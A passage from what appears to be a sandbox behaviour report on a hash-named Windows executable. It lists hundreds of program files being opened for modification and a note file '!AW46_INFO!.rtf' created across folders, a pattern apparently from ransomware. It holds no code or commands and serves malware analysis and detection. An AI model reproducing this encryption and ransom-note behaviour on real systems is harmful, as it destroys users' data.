Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\StartBackup.vst 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\rt.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\accessibility.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\To_Do_List.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\bn.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\WriteStart.vsx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fa.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\SendMove.rmi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\icudtl.dat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santiago 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\setup.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.dll.sig 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program 